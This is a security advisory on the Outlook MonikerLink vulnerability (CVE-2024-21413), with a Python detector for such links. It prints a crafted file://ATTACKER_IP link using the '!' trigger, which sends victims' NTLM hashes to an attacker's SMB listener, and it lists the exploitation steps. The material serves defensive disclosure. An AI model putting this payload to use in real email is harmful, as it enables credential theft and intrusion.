Microsoft Outlook Remote Code Execution Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the MonikerLink Remote Code Execution vulnerability (CVE-2024-21413) in Microsoft Outlook, assessed its impact and developed mitigation measures for the vulnerability.

Microsoft Outlook is a widely used personal information management application from Microsoft. A MonikerLink vulnerability was observed in the Microsoft Outlook email client. The flaw arises in how Outlook handles specific hyperlinks, allowing remote attackers to execute arbitrary code on the victim’s system. Threat actors can bypass Outlook’s security protocols by manipulating the URL behind the hyperlink, allowing them to take control of the victim’s system or gain unauthorized access.

Product Versions Impacted

A list of all impacted product versions:

  • Microsoft Office 2016 (64-bit edition)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office LTSC 2021 for 32-bit editions
  • Microsoft Office LTSC 2021 for 64-bit editions
  • Microsoft 365 Apps for Enterprise for 64-bit Systems
  • Microsoft 365 Apps for Enterprise for 32-bit Systems
  • Microsoft Office 2019 for 64-bit editions
  • Microsoft Office 2019 for 32-bit editions

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-21413.

The CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This vulnerability, dubbed the “MonikerLink bug,” abuses the Windows Component Object Model (COM), leading to a local NTLM (New Technology LAN Manager) credential leak and potentially to remote code execution. Threat actors can leverage CVE-2024-21413 to execute arbitrary code by circumventing the security protocols of the email client. Email security measures such as DKIM (DomainKeys Identified Mail), DMARC (Domain-based Message Authentication, Reporting and Conformance) and SPF (Sender Policy Framework), which are designed to stop spoofing, forged addresses and similar abuse, are part of SMTP authentication. This flaw circumvents those email security mechanisms, since they operate at the SMTP authentication level rather than on the hyperlink itself.

Microsoft Outlook can parse hyperlinks such as HTTP/HTTPS links. Outlook also has its own security mechanisms, such as “Protected View” and the “Preview Pane,” for handling emails that carry attachments or hyperlinks. With these features, it displays a warning message or a security prompt when a hyperlink would launch an application for a protocol other than HTTP/HTTPS, as shown in Figure 1.

Figure 1: Outlook’s Protected View Security Warning

The “Protected View” feature usually blocks macros and is prompted more often for emails that come from outside the organization.

A moniker is a COM object used to create instances of other objects or to link one document to another through various COM-based functions. When a common file:// moniker link is placed in a hyperlink, it instructs Outlook to access a file over the network, which uses the SMB protocol and involves local NTLM authentication.

<p><a href="file://ATTACKER_IP/test">CVE-2024-21413</a></p>

A simple tweak, such as adding the special character “!” and additional text to the above moniker link, triggers this vulnerability.

Triggering the Vulnerability

Triggering this NTLM leak vulnerability in Microsoft Outlook requires a specially crafted Moniker Link that bypasses Outlook’s Protected View. CVE-2024-21413 exploits the MkParseDisplayName API, a function that parses a human-readable name into a moniker that can be used to identify a link source. The moniker can be as simple as a file:// moniker. The vulnerability is triggered by modifying the hyperlink with the “!” special character and additional text, as in the Moniker Link below:

<p><a href="file://ATTACKER_IP/test!exploit">CVE-2024-21413</a></p>

This bypasses Outlook’s Protected View and leads to an authentication attempt over the SMB protocol, sending the victim’s Windows Net-NTLMv2 hash to the attacker. This one-click RCE is demonstrated in Figure 2.
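From the defender’s side, the two link forms above are easy to tell apart in an email body. The following added example (not code from the advisory) scans HTML anchors, flags any file:// link that points at a remote host (an SMB/NTLM authentication trigger) and separately flags the “!”-in-path form that characterizes the CVE-2024-21413 trigger; the sample email body is constructed and the host is a documentation-range placeholder address.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample email body (not from the advisory): one ordinary HTTPS link,
# one plain file:// UNC link and one link in the CVE-2024-21413 "!" form.
SAMPLE_EMAIL_HTML = """
<p>Quarterly report: <a href="https://example.com/report">view online</a></p>
<p><a href="file://203.0.113.10/share/report">open on the file server</a></p>
<p><a href="file://203.0.113.10/share/report!anything">CVE-2024-21413</a></p>
"""

class _AnchorCollector(HTMLParser):
    """Collect every href attribute of <a> tags in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":                        # HTMLParser lowercases tag/attr names
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value.strip())

def classify_href(href):
    """Return None, 'remote-file-link' or 'monikerlink' for a single hyperlink target."""
    parts = urlsplit(href.replace("\\", "/"))  # file:\\host\share is also a UNC form
    if parts.scheme.lower() != "file" or not parts.netloc:
        return None                            # not a file:// link to a remote host
    # A '!' after the UNC path turns the link into a composite moniker (the CVE trigger).
    if "!" in parts.path:
        return "monikerlink"
    return "remote-file-link"                  # still forces SMB/NTLM authentication

def scan_html_body(html):
    """Return (href, verdict) pairs for every suspicious link in an HTML email body."""
    collector = _AnchorCollector()
    collector.feed(html)
    findings = []
    for href in collector.hrefs:
        verdict = classify_href(href)
        if verdict:
            findings.append((href, verdict))
    return findings

if __name__ == "__main__":
    for href, verdict in scan_html_body(SAMPLE_EMAIL_HTML):
        print(f"{verdict:17} {href}")
```

Run this over the HTML part of inbound mail at the gateway or in a mail-flow rule to quarantine or strip such links before they reach a client.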

Figure 2: One-click RCE

Exploitation

The crucial part of exploiting this vulnerability is the victim clicking the malicious hyperlink sent over email. A PoC update has since been released that requires no user interaction at all, making it a zero-click NTLM leak.

In the demonstration, Outlook does show a warning box, but that is not the central issue.

Figure 3: Outlook Tested Version

The exploit demonstrated in Figure 2 follows a series of steps that complete in a very short time:

  • A script sends a malicious email from the attacker’s email client to the victim’s email client.
  • The attacker sets up an SMB listener and runs the PoC.
  • The victim clicks on the specially crafted link received over email.
  • The victim’s hash and login are captured (without the warning prompt on the affected Outlook version).

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:4305 Microsoft Outlook MONIKERLINK Security Feature Bypass
  • IPS:4307 Microsoft Outlook MONIKERLINK Security Feature Bypass 2

Remediation Recommendations

Considering the severe consequences of this vulnerability, the users of affected products are strongly encouraged to apply the patches as published in the vendor advisory.

Relevant Links
